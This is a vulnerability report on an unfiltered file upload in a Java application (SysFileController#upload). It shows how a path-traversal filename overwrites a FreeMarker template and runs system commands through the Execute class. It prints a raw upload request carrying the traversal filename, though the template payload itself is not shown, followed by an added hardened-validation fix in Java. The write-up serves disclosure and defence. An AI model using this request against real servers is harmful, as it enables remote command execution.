Description
Vulnerability exploitation point:
com.wstro.controller.SysFileController#upload applies no filtering to the uploaded file, so arbitrary files can be uploaded.
The upload endpoint is not under the "/admin/" path, so any user can access /file/.

The Java application also uses FreeMarker through Spring ("springfreemarker").

With Spring's FreeMarker integration, FreeMarker cannot access Java classes directly by default, but in some cases the ?new built-in can be used to reach system classes. The class freemarker.template.utility.Execute allows system commands to be executed. A file in .ftl format can therefore be uploaded to overwrite src/main/webapp/WEB-INF/templates/error.ftl and run the system command "whoami"; its output is echoed back on the page, ultimately resulting in a command execution vulnerability.
The final vulnerability payload is:
POST /file/upload HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAqZf05643BuD8TBp
Connection: close
Content-Length: 565
------WebKitFormBoundaryAqZf05643BuD8TBp
Content-Disposition: form-data; name="portraitFile"; filename="/../../../../WEB-INF/templates/error.ftl"
Content-Type: image/png

When a non-existent path is requested, error.ftl is rendered and the "whoami" command is executed directly.
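As an added example (not part of this report or the project's code), the following hardened version of the filename handling shows the checks whose absence the report describes; the upload directory and the allowed-extension list are assumptions, and the Spring controller wiring is omitted so the class compiles stand-alone:

```java
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Locale;
import java.util.Set;

// Added example, not the project's code: hardened replacement for the unfiltered
// filename handling in SysFileController#upload; baseDir and extensions assumed.
public final class SafeUploadPath {
    // "portraitFile" is expected to be an image; .ftl is deliberately absent,
    // so a template can never be written regardless of the path given.
    private static final Set<String> ALLOWED_EXT = Set.of("png", "jpg", "jpeg", "gif");
    // Returns the path the upload may be written to, or throws when the
    // client-supplied name escapes baseDir or has a disallowed extension.
    public static Path resolveUploadTarget(Path baseDir, String clientFilename) {
        if (clientFilename == null || clientFilename.isEmpty()) {
            throw new IllegalArgumentException("missing filename");
        }
        // 1. Keep only the last segment: drops "/../../../../WEB-INF/templates/"
        //    style prefixes for both '/' and '\' separators.
        String name = clientFilename.replace('\\', '/');
        name = name.substring(name.lastIndexOf('/') + 1);
        if (name.isEmpty() || name.equals(".") || name.equals("..")) {
            throw new IllegalArgumentException("invalid filename");
        }
        // 2. Allow-list the extension (case-insensitive).
        int dot = name.lastIndexOf('.');
        String ext = dot < 0 ? "" : name.substring(dot + 1).toLowerCase(Locale.ROOT);
        if (!ALLOWED_EXT.contains(ext)) {
            throw new IllegalArgumentException("extension not allowed: " + ext);
        }
        // 3. Normalize and confirm the result is still inside baseDir; this
        //    holds even if step 1 is ever relaxed to allow sub-directories.
        Path base = baseDir.toAbsolutePath().normalize();
        Path target = base.resolve(name).normalize();
        if (!target.startsWith(base)) {
            throw new IllegalArgumentException("path escapes upload directory");
        }
        return target;
    }
    public static void main(String[] args) {
        Path base = Paths.get("/var/app/uploads"); // assumed upload directory
        try { // the filename from the request above is rejected
            resolveUploadTarget(base, "/../../../../WEB-INF/templates/error.ftl");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
        System.out.println("accepted: " + resolveUploadTarget(base, "avatar.png"));
    }
}
```

Independently of the upload fix, FreeMarker's Configuration.setNewBuiltinClassResolver(TemplateClassResolver.SAFER_RESOLVER) refuses to instantiate freemarker.template.utility.Execute via ?new, which removes the command-execution step even if a template were overwritten.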


